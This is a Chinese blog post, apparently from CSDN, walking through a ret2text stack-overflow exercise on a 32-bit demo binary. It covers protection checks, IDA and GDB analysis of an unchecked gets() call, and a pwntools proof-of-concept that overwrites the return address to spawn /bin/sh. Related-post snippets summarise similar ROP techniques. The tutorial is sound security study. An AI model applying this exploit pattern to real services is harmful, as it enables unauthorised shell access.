PWN初体验之ret2text

已于 2022-08-05 00:32:49 修改
阅读量815 收藏 8
点赞数 2
分类专栏: IOT漏洞挖掘学习笔记 文章标签: ubuntu linux 运维
于 2022-08-04 22:11:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43137410/article/details/126167548
版权
本文介绍了二进制漏洞挖掘中的一个DEMO——returntotext的分析过程。通过文件信息查看、静态分析及动态调试,揭示了栈溢出的条件,并找到了可利用的system函数。最终,成功编写并执行了POC脚本来覆盖返回地址,执行了/bin/sh命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 序

​ "Hello,World!"的浪漫可能只有直男才懂!在1就是1、0就是0的非黑即白的元宇宙世界里一定只会有少年的足迹!天真永不消逝,浪漫至死不渝!生命不熄,学习不止!致每一个有梦想却被现实抛弃和质疑的追梦人!

​ 言归正传,最近在学习二进制漏洞的挖掘,今天就拿一个demo做一个return to text的分析。

0x01 文件分析

​ Demo是一个名为ret2text的文件,在Ubuntu中使用file命令查看文件信息。

在这里插入图片描述

  • 是一个ELF可执行文件
  • 32位
  • 小端序
  • i386架构

​ 使用checksec查看保护开启情况

在这里插入图片描述

  • RELRO开启Partial模式
  • 未开启金丝雀保护
  • 堆栈不可执行
  • 未开启内存地址随机化

0x02 静态分析

​ 使用32位IDA打开ELF文件

在这里插入图片描述

查看分析伪代码

在这里插入图片描述

  • 定义字符变量s。
  • 调用gets函数获取输入并存到s中。
  • 在调用gets函数时并未对输入进行长度的判断,存在可溢出点。

查看汇编代码

在这里插入图片描述

  • 在调用gets函数之前将参数s的地址赋值给了eax
  • 并将s的地址作为gets函数的参数压住栈中

0x03 动态调试

​ 在Ubuntu使用GDB调试文件。

在这里插入图片描述

​ 将断点下到main函数,运行文件。

在这里插入图片描述

​ 单步调试到调用gets函数时。

在这里插入图片描述

  • 此时eax的值(参数s的地址)为0xffffd0bc。

使用命令stack查看函数调用栈的情况。

在这里插入图片描述

  • esp指针的地址为0xffffd0a0
  • ebp指针的地址为0xffffd128
  • 那么函数返回的地位就是0xffffd12c
  • s的位置在0xffffd0bc。

测试输入覆盖

在这里插入图片描述

  • 可以完成栈数据的覆盖

计算输入点到返回地址的长度

在这里插入图片描述

  • 0x70的长度可以覆盖到返回地址

测试

在这里插入图片描述

  • 成功覆盖到返回值地址
  • 可再用四个字节即可覆盖返回地址

0x04 查找代码可执行点

​ 在IDA查询是否有system函数可以利用。

在这里插入图片描述

  • 文件调用了system()函数
  • 并在调用时直接执行了/bin/sh命令

​ 查找命令执行的地址

在这里插入图片描述

  • 找到引用地址0x0804863A

0x05 POC编写

from pwn import *

context.arch = "i386"

p = process("./ret2text")
elf = ELF("./ret2text")
libc = ELF("/lib/i386-linux-gnu/libc-2.27.so")


padding = "a"*0x70
retaddr = 0x0804863A
payload = padding + p32(retaddr)

p.sendlineafter("do you know anything?\n",payload)
p.interactive()
  • 该POC脚本为本地利用,pwntools也提供远程利用方式。
  • 使用了相对地址,脚本与文件放在同一目录下。

0x06 运行脚本

在这里插入图片描述

  • 成功执行命令
pwn ret2text
young‘s blog
02-06 1543
好久没有写博客了,今天记录一下做ctf-wiki上ret2text的过程,也记录一下学到的东西,一点一点积累成长。 地址:ctf-wiki 源程序也在里面 边看视频边学的,视频地址为: ret2text 程序下载好之后通过checksec查看保护措施: 没有开启canary,32位动态链接程序 知道程序的基本信息后运行一下程序,看看程序都有什么功能。 测试后得知只有一个输入点。 拖进ida分析一下...
PWN ret2text
prettyX的博客
11-21 1006
今天跟着B站UP学习了ROP,向UP表示感谢。 0X01 什么是ROP ROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。 0X02 ROP使用的地方 1、当程序开启了NX保护机制;NX策略是使栈区域的代码无法执行,但我们可以使用RO...
pwn自学笔记(1)--——ret2text
CDU__mint__的博客
10-05 2033
此篇文章是对ret2text的学习初步总结。目标利用栈溢出执行危险程序获取shell。
ret2text
m0_49959202的博客
09-18 309
文章目录ret2text1.检查保护机制2.ida分析程序3.exp编写 ret2text 进程存在危险函数如system(“/bin”)或execv(“/bin/sh”,0,0)的片段,可以直接劫持返回地址到目标函数地址上,从而获取shell。 1.检查保护机制 首先调用checksec,检查保护机制: 发现pie没有开启 2.ida分析程序 使用ida打开程序ret2text,静态分析: 发现main函数中存在函数:vulnerable(),里面有危险函数gets(),可以用来进行栈溢出 发现
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1758
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
pwn(三)
小明的小书包Ya
10-04 2548
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1545
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 2039
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
2016hctf Writeup.md
热门推荐
Ni9htMar3的博客
12-05 1万+
第一次和同学以战队MiRag3参加XCTF联赛,经验不足,技术较弱,以后会加倍努力~!留个爪纪念一下~~WEB2099年的flag直接burpsuit截断,修改消息请求头如下:直接得到flagRESTFUL这里主要考察的是RESTFUL格式 index.php/参数/值 然后根据提示只要put money 大于 12450即可兵者多诡题目说明为上传图片,首先上传一个图片试试。点击上传图片,发现u
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 4691
pwn笔记 - ret2text - 函数传参
PWN做题笔记1-ret2text(已校对)
qq_40923256的博客
04-19 3369
原题位置:CTFHub 题目属于栈溢出 给出了地址和端口,压缩包中有一个二进制程序pwn file pwn可以看到是64位ELF程序 checksec发现没有开启地址空间随机化机制 程序运行如下: ida64反汇编,发现输入没有边界检查,存在注入 secure函数调用了system返回一个服务器里的shell,因此目标是调用这个函数 函数地址如下: main函数栈结构如下: 目标是覆盖掉ebp,地址偏移为0x70+8,这部分覆盖为“A”,之后ebp覆...
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6797
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
pwn基本ROP——ret2text
turtlesd的博客
04-25 1053
ret2text环境原理漏洞分析利用`checksec [file_name]`指令获取可执行文件的保护措施开放情况利用IDA32位进行调试利用pwndbg获取偏移量payload 环境 ret2text 原理 控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限 漏洞分析 利用checksec [file_name]指令获取可执行文件的保护措施开放情况 命令: checksec ret2text 可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。 也就是
pwn ,ret2text
amber_o0k的博客
07-28 308
直接gdb ret2text,然后start进调试模式 用gdb自带命令,pattern create 200,生成一个200个字符的字符串,后面会用到。 用gdb自带命令,pattern create 200,生成一个200个字符的字符串 单走一个r,让程序跑起来 ,且程序会让你输入,把字符串怼进去 然后程序就会报错了,EIP显示的字符就是程序即将执行的字符,需要将这个字符替换为想要执行的函数的地址。 用gdb自带的命令数一下在“AA8A”之前还有多少个字符...
PWN基础8:Ret2Text 实例
prettyX的博客
07-12 572
基础知识 1、栈溢出快速确定偏移量: pwndbg cyclic 200 cyclic -l 异常地址 peda pattern create 200 pattern offset 异常地址 2、定位system函数 objdump -t XXX 查看程序中使用到的函数 objdump -d XXX 查看程序中函数的汇编代码 objdump -d -M intel XXX 查看程序中函数的汇编代码,并且汇编代码是intel架构的
【ctf】ret2text
woodwhale的博客
04-17 6123
PWN ret2text 题目链接:ret2text 参考博客:CTF Wiki 基本 ROP 参考视频:【CTF】Linux PWN入门 Bamboofox社课系列 0x01 下载ret2text文件,复制到 翔哥的van美pwn机 中 查看保护机制 Arch: i386-32-little //文件为32位程序 RELRO: Partial RELRO Stack: No canary found //未开启canary保护 NX: NX enabled
PWN入门(三)——ret2text /ret2syscall /ret2shellcode
Jack_Grealish的博客
11-10 1351
根据目录看文章结构,优快云中没有Typora那么多级标题,所以有点乱。
浅谈 ret2text
akdelt的博客
01-21 1578
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
pwn ret2system
最新发布
03-03
### ret2system 漏洞利用技术详解 #### 背景介绍 ret2system是一种基于返回导向编程(ROP)的技术,通常用于绕过不可执行堆栈保护机制。这种攻击方式依赖于调用`system()`函数来执行命令或启动shell[^1]。 #### 原理说明 当存在缓冲区溢出漏洞时,如果程序中已经包含了对`system()`函数的合法调用,则可以直接覆盖返回地址指向该处。由于`system()`接受一个参数作为要执行的命令字符串,因此还需要找到这个字符串在内存中的位置并将其传递给`system()`. 如果目标进程中恰好有"/bin/sh"这样的字符串,那么就可以构造payload使得`system("/bin/sh")`被执行从而获得交互式的shell. 但是,在很多情况下,直接找到合适的`system()`调用并不容易实现。此时可以考虑寻找其他可能的方法: - **间接调用**:即使没有现成的`system()`调用路径,也可以尝试通过修改寄存器值或其他手段间接达到相同效果。 - **自定义输入**:有时可以通过精心设计的数据输入让程序自己创建所需的环境变量或者文件描述符等资源,进而触发期望的操作。 对于具体案例提到的情况——即发现了`gets()`导致的栈溢出但未能定位到`system("/bin/sh")`—这表明虽然具备基本条件但仍需进一步探索可用 gadge t 或者创造性的方法去完成整个链条构建[^2]. ```c // 示例代码片段展示如何构造 payload 来利用 ret2system 漏洞 (假设已知 system 地址 和 "/bin/sh" 字符串的位置) char *args[] = {"/bin/sh", NULL}; void (*sys)(const char *) = &system; // 获取 system 函数指针 (*sys)("echo 'Hello from ret2system!'"); ``` 值得注意的是,上述讨论仅限于理论层面的研究探讨;任何未经授权的实际操作均属违法行为,并违反道德准则。安全研究人员应当始终遵循法律法规以及职业操守的要求开展工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值